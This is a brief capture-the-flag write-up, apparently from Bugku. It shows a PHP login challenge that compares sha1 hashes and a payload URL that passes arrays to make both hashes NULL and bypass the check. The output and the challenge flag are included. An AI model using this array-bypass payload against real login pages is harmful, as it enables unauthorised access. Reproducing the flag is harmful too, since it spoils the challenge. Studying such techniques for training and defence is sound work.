<?php $flag = "flag"; if (isset($_GET['name']) and isset($_GET['password'])) { var_dump($_GET['name']); echo " "; var_dump($_GET['password']); var_dump(sha1($_GET['name'])); var_dump(sha1($_GET['password'])); if ($_GET['name'] == $_GET['password']) echo ' Your password can not be your name! '; else if (sha1($_GET['name']) === sha1($_GET['password'])) die('Flag: '.$flag); else echo ' Invalid password. '; } else echo ' Login first! '; ?>
sha跟md5函数一样,可以用数组绕过
payload
http://123.206.87.240:9009/7.php?name[]=1&password[]=2
得到
array(1) { [0]=> string(1) "1" }
array(1) {
[0]=>
string(1) "2"
}
NULL
NULL
Flag: flag{bugku--daimasj-a2}